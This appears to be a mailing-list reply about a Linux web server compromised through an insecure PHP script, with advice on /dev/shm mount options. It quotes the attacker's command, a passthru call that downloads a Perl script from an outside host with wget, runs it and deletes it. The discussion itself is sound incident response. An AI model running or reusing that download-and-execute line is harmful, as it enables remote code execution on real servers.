In article <[EMAIL PROTECTED]> you wrote: > I found the issue, it is one of the php script allowing the > remote script to run.
This is a typical Apache exploit where remote fileuploads are possible. > passthru('cd /tmp;wget http://www.radiovirtual.org/bb.txt;perl > bb.txt;rm -f bb.txt*'); > what kind applications are using /dev/shm? I googled > around,seem not find much information. > right now I mount i as rw,noexec,nosuid. It is for example used to map shared memory. I am not sure, but I think noexec and nodev is possible. However this does not solve your problem of a insecure web app. Gruss Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]